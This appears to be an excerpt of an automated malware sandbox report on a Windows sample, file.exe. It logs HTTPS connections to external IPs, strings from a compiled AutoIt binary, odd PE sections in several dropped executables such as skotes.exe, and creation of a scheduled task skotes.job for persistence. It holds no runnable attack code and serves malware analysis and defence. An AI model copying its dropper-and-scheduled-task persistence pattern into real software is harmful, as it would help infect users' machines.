                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52434
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52449
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52446
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52447
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52444
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52422 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52450
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52500 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52594 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52584 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52400 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52461
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52434 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52572 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52385 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52412 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52509 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52510 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52481 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52389 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52446 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52424 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52448 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52402 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49823 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49837 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49839 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49848 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50066 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:50111 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50116 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50118 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50120 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50119 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50119 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50122 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50125 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50126 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50133 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50137 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50141 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50142 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50153 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50159 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50164 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50167 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50175 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50176 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50178 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50196 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50198 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50203 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50207 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50206 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:52382 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52383 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52385 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52393 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52394 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.6:52412 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.6:52414 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:52418 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.6:52420 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52419 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52423 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52425 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:52426 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:52424 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:52428 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52448 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52449 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52445 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52446 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52444 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52447 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52450 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:52481 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.182.143.214:443 -> 192.168.2.6:52496 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52511 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52513 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52509 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52512 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52510 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52514 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52516 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52517 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:52518 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:52533 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:52594 version: TLS 1.2

                      System Summary

                      barindex
                      Binary is likely a compiled AutoIt script file
                      Source: 846d486827.exe, 0000001C.00000000.2921166068.00000000002A2000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ab74e6f4-a
                      Source: 846d486827.exe, 0000001C.00000000.2921166068.00000000002A2000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7a4d62a3-2
                      PE file contains section with special chars
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: random[1].exe.0.drStatic PE information: section name:
                      Source: random[1].exe.0.drStatic PE information: section name: .idata
                      Source: random[1].exe.0.drStatic PE information: section name:
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name:
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name: .idata
                      Source: DocumentsKJEGCFBGDH.exe.0.drStatic PE information: section name:
                      Source: skotes.exe.21.drStatic PE information: section name:
                      Source: skotes.exe.21.drStatic PE information: section name: .idata
                      Source: skotes.exe.21.drStatic PE information: section name:
                      Source: random[1].exe.22.drStatic PE information: section name:
                      Source: random[1].exe.22.drStatic PE information: section name: .rsrc
                      Source: random[1].exe.22.drStatic PE information: section name: .idata
                      Source: random[1].exe.22.drStatic PE information: section name:
                      Source: 824db60d2b.exe.22.drStatic PE information: section name:
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: .rsrc
                      Source: 824db60d2b.exe.22.drStatic PE information: section name: .idata
                      Source: 824db60d2b.exe.22.drStatic PE information: section name:
                      Source: random[1].exe0.22.drStatic PE information: section name:
                      Source: random[1].exe0.22.drStatic PE information: section name: .rsrc
                      Source: random[1].exe0.22.drStatic PE information: section name: .idata
                      Source: random[1].exe0.22.drStatic PE information: section name:
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name:
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: .rsrc
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name: .idata
                      Source: 8eeb449c35.exe.22.drStatic PE information: section name:
                      Source: random[2].exe.22.drStatic PE information: section name:
                      Source: random[2].exe.22.drStatic PE information: section name: .idata
                      Source: random[2].exe.22.drStatic PE information: section name:
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name:
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name: .idata
                      Source: 241fdb96f6.exe.22.drStatic PE information: section name:
                      Source: random[2].exe0.22.drStatic PE information: section name:
                      Source: random[2].exe0.22.drStatic PE information: section name: .idata
                      Source: fb696bafb5.exe.22.drStatic PE information: section name:
                      Source: fb696bafb5.exe.22.drStatic PE information: section name: .idata
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C9CB700
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CB8C0 rand_s,NtQueryVirtualMemory,0_2_6C9CB8C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C9CB910
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C96F280
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeFile created: C:\Windows\Tasks\skotes.job
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9635A00_2_6C9635A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C976C800_2_6C976C80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C34A00_2_6C9C34A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CC4A00_2_6C9CC4A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98D4D00_2_6C98D4D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9764C00_2_6C9764C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A6CF00_2_6C9A6CF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96D4E00_2_6C96D4E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A5C100_2_6C9A5C10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B2C100_2_6C9B2C10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DAC000_2_6C9DAC00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D542B0_2_6C9D542B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D545C0_2_6C9D545C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9754400_2_6C975440
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A0DD00_2_6C9A0DD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C85F00_2_6C9C85F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98ED100_2_6C98ED10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9905120_2_6C990512
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97FD000_2_6C97FD00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C985E900_2_6C985E90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CE6800_2_6C9CE680
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C4EA00_2_6C9C4EA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96BEF00_2_6C96BEF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97FEF00_2_6C97FEF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D76E30_2_6C9D76E3
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A7E100_2_6C9A7E10
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B56000_2_6C9B5600
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C9E300_2_6C9C9E30
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C989E500_2_6C989E50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A3E500_2_6C9A3E50
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B2E4E0_2_6C9B2E4E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9846400_2_6C984640
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96C6700_2_6C96C670
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D6E630_2_6C9D6E63
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B77A00_2_6C9B77A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C996FF00_2_6C996FF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96DFE00_2_6C96DFE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A77100_2_6C9A7710
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C979F000_2_6C979F00
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9960A00_2_6C9960A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D50C70_2_6C9D50C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98C0E00_2_6C98C0E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A58E00_2_6C9A58E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9778100_2_6C977810
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB8200_2_6C9AB820
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B48200_2_6C9B4820
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9888500_2_6C988850
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98D8500_2_6C98D850
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AF0700_2_6C9AF070
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A51900_2_6C9A5190
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C29900_2_6C9C2990
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C99D9B00_2_6C99D9B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C96C9A00_2_6C96C9A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98A9400_2_6C98A940
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BB9700_2_6C9BB970
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DB1700_2_6C9DB170
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97D9600_2_6C97D960
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DBA900_2_6C9DBA90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C97CAB00_2_6C97CAB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D2AB00_2_6C9D2AB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9622A00_2_6C9622A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C994AA00_2_6C994AA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9A8AC00_2_6C9A8AC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C981AF00_2_6C981AF0
